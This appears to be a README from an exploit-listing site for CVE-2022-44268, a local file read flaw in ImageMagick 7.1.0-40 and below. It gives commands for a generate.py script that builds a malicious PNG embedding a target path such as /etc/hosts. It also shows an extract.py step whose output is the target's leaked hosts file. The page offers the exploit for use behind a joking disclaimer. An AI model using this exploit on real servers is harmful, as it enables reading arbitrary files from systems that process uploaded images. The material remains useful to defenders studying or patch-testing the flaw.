Share
## https://sploitus.com/exploit?id=F64ADDF1-A9D1-52B4-A5CB-9ACDDA5F648A
# CVE-2022-44268

**ImageMagick** is a free and open-source cross-platform software suite for displaying, converting, and editing raster image and vector image files. It can read and write over 200 image file formats. ImageMagick is licensed under the Apache License 2.0. It is available in the form of command-line tools, as well as a C API and a set of C++ classes. [Wikipedia](https://en.wikipedia.org/wiki/ImageMagick)

**ImageMagick** versions 7.1.0-40 and below are vulnerable to a Local File Inclusion vulnerability. The vulnerability is due to the improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a crafted PNG file to the target. Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the target system.

**Credit to the researchers who discovered this:**
- [Bryan Gonzalez and the Ocelot Team](https://www.metabaseq.com/imagemagick-zero-days/)

**Create a malicious PNG to take advantage of ImageMagick 7.1.0-40:**
- CVE-2022-44267: Denial of Service
- CVE-2022-44268: Information Disclosure


## Requirements
- Python3
- PIL (`pip install Pillow`)

## Usage
Crafting a PNG with **generate.py**:
```shell
python3  generate.py -i input.png -f "/etc/hosts" -o exploit.png

     
  ______     __  _____                   ______                
 |  _ \ \   / / |  __ \                 |  ____|               
 | |_) \ \_/ /  | |__) |__   __ _ ______| |__ _ __ ___   __ _  
 |  _ < \   /   |  ___/ _ \ / _` |______|  __| '__/ _ \ / _` | 
 | |_) | | |    | |  | (_) | (_| |      | |  | | | (_) | (_| | 
 |____/  |_|    |_|   \___/ \__, |      |_|  |_|  \___/ \__, | 
                             __/ |                       __/ | 
                            |___/                       |___/  

    

   [*] ImageMagick LFI Exploit
   [*] Embedding Payload to read the target file
   [*] Exploit PNG generated: exploit.png

```

## PoC
```shell
python3 extract.py downloaded_img.png
127.0.0.1       localhost
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

```

*Disclaimer: Be a good boy plz don't use it for bad deeds*